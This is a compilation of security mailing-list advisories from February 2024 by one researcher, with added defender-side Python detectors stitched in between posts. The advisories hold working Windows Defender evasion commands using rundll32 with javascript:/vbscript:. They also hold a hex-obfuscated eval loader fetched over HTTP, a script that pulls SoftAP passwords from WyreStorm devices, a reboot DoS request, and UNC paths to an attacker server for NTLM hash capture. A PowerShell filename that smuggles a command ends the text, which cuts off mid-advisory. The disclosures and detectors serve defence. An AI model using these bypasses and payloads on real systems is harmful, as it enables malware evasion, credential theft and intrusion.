[FD] Microsoft Windows Defender / Backdoor:JS/Relvelshe.A / Detection Mitigation Bypass

2024-02-20 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec



[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Detection Mitigation Bypass
Backdoor:JS/Relvelshe.A


[CVE Reference]
N/A


[Security Issue]
Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A
detection in Defender, but it no longer works as it was mitigated.
However, by adding a simple JavaScript try/catch error statement and
eval'ing the hex string, it executes as of the time of this post.


[References]
https://twitter.com/hyp3rlinx/status/1480657623947091968


[Exploit/POC]
1) python -m http.server 80

2) Open command prompt as Administrator

3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+" http://localhost/yo.tmp;)

Create file and host on server, this is contents of the "yo.tmp" file.




try{
  <![CDATA[
  var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
  var str = '';
  for (var n = 0; n < hex.length; n += 2) {
    str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
  }
  eval(str)
  ]]>
}catch(e){
  eval(str)
}




[Network Access]
Local



[Severity]
High


[Disclosure Timeline]
Vendor Notification:
February 18, 2024: Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
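As an added, defender-side example that is not part of the advisory: a small Python triage function that looks for the loader shape described above (a hex string literal decoded through parseInt/String.fromCharCode and handed to eval, with a second eval reachable from the catch block) and decodes the literal so an analyst can read what it would run. The sample input is a constructed copy of the yo.tmp contents; the score weights and the indicator list are my own assumptions.

```python
import re

# Constructed copy of the yo.tmp loader shown in the advisory, used only as sample input.
SAMPLE_YO_TMP = r'''try{
<![CDATA[
var hex =
"6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
}catch(e){
eval(str)
}
'''

# Quoted literal made only of hex digit pairs, 16+ digits long: a candidate encoded payload.
HEX_LITERAL_RE = re.compile(r'["\']((?:[0-9A-Fa-f]{2}){8,})["\']')
# The decode loop shape: parseInt(<x>.substr(..., 2), 16) handed to String.fromCharCode.
HEX_DECODE_LOOP_RE = re.compile(
    r'String\.fromCharCode\s*\(\s*parseInt\s*\([^)]*substr[^)]*\)\s*,\s*16\s*\)')
EVAL_RE = re.compile(r'\beval\s*\(')
# eval reached again from a catch block: what the 2024 variant adds to the 2022 loader.
EVAL_IN_CATCH_RE = re.compile(r'catch\s*\([^)]*\)\s*\{[^}]*\beval\s*\(', re.S)
# Strings worth surfacing once a payload is decoded (a starting list, not exhaustive).
DECODED_INDICATORS = ("ActiveXObject", "WScript.Shell", ".Run(", "GetObject(")


def decode_hex_literal(hex_str):
    """Decode a hex literal the same way the loader's loop does (one byte per pair)."""
    return bytes.fromhex(hex_str).decode("latin-1")


def triage_script(text):
    """Score one script body (HTA/SCT/JS) for the hex-decode-then-eval loader pattern."""
    decoded = [decode_hex_literal(m.group(1)) for m in HEX_LITERAL_RE.finditer(text)]
    indicators = sorted({ind for s in decoded for ind in DECODED_INDICATORS if ind in s})
    findings = {
        "hex_decode_loop": bool(HEX_DECODE_LOOP_RE.search(text)),
        "eval_calls": len(EVAL_RE.findall(text)),
        "eval_in_catch": bool(EVAL_IN_CATCH_RE.search(text)),
        "cdata_wrapper": "<![CDATA[" in text,
        "decoded_payloads": decoded,
        "decoded_indicators": indicators,
    }
    # Weights are an assumption: loop + eval is the 2022 loader; the catch-side eval
    # and a decoded shell indicator each push the verdict further.
    score = (2 * findings["hex_decode_loop"] + (findings["eval_calls"] > 0)
             + 2 * findings["eval_in_catch"] + 2 * bool(indicators))
    findings["score"] = int(score)
    findings["verdict"] = "suspicious" if score >= 4 else "clean"
    return findings


if __name__ == "__main__":
    for key, value in triage_script(SAMPLE_YO_TMP).items():
        print(f"{key}: {value}")
```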


[FD] Microsoft Windows Defender / VBScript Detection Bypass

2024-02-20 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender VBScript Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka
"POWERLIKS" type execution that leverages rundll32.exe. Attempts at
execution fail and attackers will typically get an "Access is denied"
error message. Previously I have disclosed 3 bypasses using rundll32
javascript; this example leverages the VBScript and ActiveX engine.

Running the following will typically get blocked by Windows Defender with
an "Access is denied" message:

rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

Trojan:Win32/Powessere.G
Category: Trojan
This program is dangerous and executes commands from an attacker.

However, you can add arbitrary text as the 2nd mshtml parameter, building
off my previous javascript based bypasses, to skirt Defender detection.
For example, adding "shtml", "Lol" or other text, and it will execute as
of the time of this writing.

E.g.

C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)


[References]
https://twitter.com/hyp3rlinx/status/1759260962761150468
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/


[Exploit/POC]
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Access is denied.

C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

We win!

[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification:
February 18, 2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 3

2024-02-20 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka
"POWERLIKS" type execution that leverages rundll32.exe. Attempts at
execution fail and attackers will typically get an "Access is denied"
error message.

Back in 2022, I first disclosed how that could be easily bypassed by
passing an extra path traversal when referencing mshtml, but that has
since been mitigated. Recently, on Feb 7, 2024, I disclosed that using
multiple commas "," will bypass that mitigation, but that has since been
fixed again. The fix was short lived, as I found yet another, third
trivial bypass soon after.


[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')


[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg


[Network Access]
Local


[Severity]
High


[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601


[Disclosure Timeline]
Vendor Notification:
February 16, 2024 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 2.

2024-02-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.

Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka
"POWERLIKS" type execution that leverages rundll32.exe. Attempts at
execution fail and attackers will typically get an "Access is denied"
error message.

Back in 2022, I disclosed how that could be easily bypassed by passing an
extra path traversal when referencing mshtml, but that has since been
mitigated. However, I discovered that using multiple commas "," will
bypass that mitigation and successfully execute as of the time of this
writing.


[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt


[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
Access is denied.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)

Multi-commas, for the Win!


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
February 7, 2024: Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
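An added, defender-side example that is not the author's code, serving the rundll32 javascript:/vbscript: posts above (the VBScript variant, Part 3 and Part 2): a Python check over process command lines (the CommandLine field of a Sysmon Event 1 or a 4688 record) that canonicalises the padding tricks those posts describe (extra \..\ hops, arbitrary directory names between hops, repeated commas) so every variant reduces to mshtml,RunHTMLApplication, instead of keying on one exact string the way the bypassed signature apparently did. The sample command lines are constructed from the posts' PoCs plus two benign rundll32 invocations.

```python
import re

# Constructed command lines reproducing the shapes in the posts above: the 2022 single
# traversal, Part 2 multi-comma, Part 3 double traversal, the VBScript 'LoL' hop, then
# two benign rundll32 invocations for comparison.
SAMPLES = [
    r'''rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)''',
    r'''rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)''',
    r'''rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')''',
    r'''rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)''',
    r'''rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl''',
    r'''C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\temp\file.dat''',
]

RUNDLL32_RE = re.compile(r'(?:^|[\\/\s"])rundll32(?:\.exe)?\b', re.I)
SCRIPT_SCHEME_RE = re.compile(r'\b(javascript|vbscript):', re.I)   # script protocol handler
TRAVERSAL_RE = re.compile(r'\\+\.\.\\+')                              # \..\ or \\..\\ hop
MULTI_COMMA_RE = re.compile(r',{2,}')                                 # ',,RunHTMLApplication'
CANONICAL = "mshtml,runhtmlapplication"


def canonicalise(arg):
    """Reduce the module argument to one form regardless of the padding the posts describe."""
    arg = arg.lstrip(' "')                        # opening quote of the script string
    arg = arg.replace("\\\\", "\\")               # JS-escaped '\\' becomes a single separator
    arg = re.sub(r'(\\\.\.)+', '', arg)           # drop every \.. hop, however many
    arg = re.sub(r'\\[^\\",]+(?=\\)', '', arg)    # drop names between hops (\LoL, \PWN, extra \mshtml)
    arg = re.sub(r',+', ',', arg)                 # collapse comma runs
    return arg.lstrip("\\").lower()


def classify(cmdline):
    """Return {'match', 'scheme', 'canonical', 'reasons'} for one process command line."""
    result = {"match": False, "scheme": None, "canonical": "", "reasons": []}
    if not RUNDLL32_RE.search(cmdline):
        return result
    m = SCRIPT_SCHEME_RE.search(cmdline)
    if not m:
        return result
    result["scheme"] = m.group(1).lower()
    result["reasons"].append(f"rundll32 invoked with a {result['scheme']}: argument")
    arg = cmdline[m.end():]
    if TRAVERSAL_RE.search(arg):
        result["reasons"].append("path traversal hop(s) before the module name")
    if MULTI_COMMA_RE.search(arg):
        result["reasons"].append("repeated commas before the export name")
    result["canonical"] = canonicalise(arg)
    if result["canonical"].startswith(CANONICAL):
        result["reasons"].append("canonical form is mshtml,RunHTMLApplication")
        result["match"] = True
    return result


def scan(cmdlines):
    """Return the command lines that match, each with its reasons."""
    return [(c, classify(c)["reasons"]) for c in cmdlines if classify(c)["match"]]


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLES):
        print(cmdline)
        for r in reasons:
            print("   -", r)
```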


[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - Credentials Disclosure / CVE-2024-25735

2024-02-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.wyrestorm.com


[Product]
APOLLO VX20 < 1.3.58


[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)


[Affected Component]
Web interface, config


[Affected Product Code Base]
 APOLLO VX20 < 1.3.58, fixed in v1.3.58


[CVE Reference]
CVE-2024-25735


[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access
point) router from /device/config using an HTTP GET request. The
credentials are then returned in the HTTP response:

curl -k https://192.168.x.x/device/config

E.g. HTTP response snippet:

:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...


[Exploit/POC]
import requests

target = "https://x.x.x.x"  # Apollo VX20 address, placeholder as in the original
res = requests.get(target + "/device/config", verify=False)
body = res.text  # search the decoded response body, not the raw bytes

idx = body.find('{"password":')
if idx != -1:
    idx2 = body.find('router')
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + body[idx + 1:idx2 + 11])
        print("[+] hyp3rlinx")
else:
    print("[!] Apollo vX20 Device not vulnerable...")



[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] Wyrestorm Apollo VX20 / Account Enumeration / CVE-2024-25734

2024-02-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.wyrestorm.com


[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Account Enumeration


[CVE Reference]
CVE-2024-25734


[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The
TELNET service prompts for a password only after a valid username is
entered. Attackers who can reach the Apollo VX20 Telnet service can
therefore determine valid accounts, which can potentially allow a brute
force attack on a valid account.


[Exploit/POC]
TELNET x.x.x.x 23
username:aa
username:bb
username:admin
password:


[Network Access]
Remote


[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - DoS / CVE-2024-25736

2024-02-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.wyrestorm.com


[Product]
APOLLO VX20 < 1.3.58


[Vulnerability Type]
Incorrect Access Control (DOS)


[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58


[Affected Component]
Web interface, reboot and reset commands


[CVE Reference]
CVE-2024-25736


[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can restart the device via a /device/reboot HTTP GET
request.


[Exploit/POC]
curl -k https://192.168.x.x/device/reboot


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318

2024-02-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.ibm.com

[Product]
IBM i Access Client Solutions

[Versions]
All

[Remediation/Fixes]
None

[Vulnerability Type]
Remote Credential Theft

[CVE Reference]
CVE-2024-22318


[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential
theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
Attackers can create UNC capable paths within ACS 5250 display terminal
configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM
is enabled and the user opens an attacker supplied file the Windows
operating system will try to authenticate using the current user's session.
The attacker controlled server could then capture the NTLM hash information
to obtain the user's credentials.


[References]
https://www.ibm.com/support/pages/node/7116091


[Exploit/POC]
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250


[Network Access]
Remote


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification:  December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. Permission is
hereby granted for the redistribution of this advisory, provided that it is
not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not
responsible for any misuse of the information contained herein and accepts
no responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security related
information or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
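An added, defender-side example, not part of the advisory or of IBM's tooling: a Python scanner that walks .WS/.HOD style key=value profiles and reports any value that is a UNC path to a host outside an allowlist, marking the three parameters named above as known-bad keys. The profile texts are constructed copies of the advisory's examples; the allowlisted host fileserver01.corp.example is an assumption.

```python
import re
from dataclasses import dataclass

# Constructed copy of the legacy .WS profile shown in the advisory.
SAMPLE_WS = r"""[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250
"""

# Constructed .HOD fragment with the two parameters the advisory names.
SAMPLE_HOD = r"""screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
[KeyRemapFile]
Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
"""

# Constructed profile pointing at an allowlisted server, to show the allowlist path.
SAMPLE_TRUSTED = r"""[Keyboard]
DefaultKeyboard=\\fileserver01.corp.example\acs\custom.kmp
"""

UNC_RE = re.compile(r'^\\\\([^\\\s]+)(?:\\|$)')   # \\HOST\share... or a bare \\HOST
# Parameters the advisory identifies as reaching out over UNC; other keys are reported too.
KNOWN_KEYS = {"screenhistoryarchivelocation", "filename", "defaultkeyboard"}
TRUSTED_HOSTS = {"fileserver01.corp.example"}      # assumption: the site's own file servers


@dataclass
class Finding:
    section: str
    key: str
    host: str
    value: str
    known_key: bool


def parse_profile(text):
    """Yield (section, key, value) from .WS/.HOD style text: [Section] headers and key=value lines."""
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            yield section, key.strip(), value.strip()


def find_unc_references(text, trusted_hosts=TRUSTED_HOSTS):
    """Report every value that is a UNC path to a host outside the allowlist."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for section, key, value in parse_profile(text):
        m = UNC_RE.match(value)
        if not m or m.group(1).lower() in trusted:
            continue
        findings.append(Finding(section, key, m.group(1), value, key.lower() in KNOWN_KEYS))
    return findings


if __name__ == "__main__":
    for name, text in (("sample.ws", SAMPLE_WS), ("sample.hod", SAMPLE_HOD), ("trusted.ws", SAMPLE_TRUSTED)):
        for f in find_unc_references(text):
            flag = "known parameter" if f.known_key else "other parameter"
            print(f"{name}: [{f.section}] {f.key} -> host {f.host} ({flag})")
```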


[FD] RansomLord v2 - Anti-Ransomware Exploitation Tool / New Release

2024-01-04 Thread hyp3rlinx
RansomLord v2  - Anti-Ransomware Exploitation Tool

[Description]
RansomLord is a proof-of-concept Anti-Ransomware exploitation tool that
generates PE files, used to exploit vulnerable Ransomware pre-encryption.

Lang: C

SHA256 : 8EA83752C4096C778709C14B60B9735CC68A5971DCDB0028A0BB167550554769

This version now intercepts and terminates malware tested from 43 different
threat groups, adding Wagner, Hakbit, Paradise, Jaff, DoubleZero,
Blacksnake, Darkbit, Vohuk, Medusa and Phobus. Two of these, Wagner and
DoubleZero, are wipers supposedly used against entities in the Ukraine
conflict.

Updated the x32/x64 DLLs to exploit ten more vulnerable ransomware
Added -s Security information flag section

Lamer Security engines may incorrectly flag RansomLord DLLs as malicious!
They are NOT! Win32 API export functions are stubs that simply call exit(1)

Generated exploit DLL MD5 file hashes:
x32: DFFBE7F79077E89197334764FE6882F4
x64: 5B54E12B8B944FDF64C091B0E6588E48

[Download]
https://github.com/malvuln/RansomLord/releases/tag/v2

Malvuln
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] Windows PowerShell Single Quote Code Execution / Event Log Bypass

2024-01-04 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] twitter.com/malvuln
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Windows PowerShell

Built on the .NET Framework, Windows PowerShell helps IT professionals and
power users control and automate the administration of the Windows
operating system and applications that run on Windows.


[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass


[CVE Reference]
N/A


[Security Issue]
In the past I disclosed how PowerShell executes unintended files or
BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command line
single quote bypass and a PS event logging failure.
On the Windows command line, tab completing a filename wraps it in double
quotes, which can be leveraged to trigger arbitrary code execution.
However, if the filename gets wrapped in single quotes it failed, that
is, until now.

[Single Quote Code Exec Bypass]
Combining both the semicolon ";" and ampersand "&" characters, I found it
bypasses the single quote limitation given a malicious filename.
The trailing semicolon ";" delimits the .XML extension and helps trigger
the PE file specified, in this case DOOM.exe, and the PS event log gets
truncated.

Take the following three test cases using the Defender API, which takes a
specially crafted filename:

C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"

1) Double quotes OK
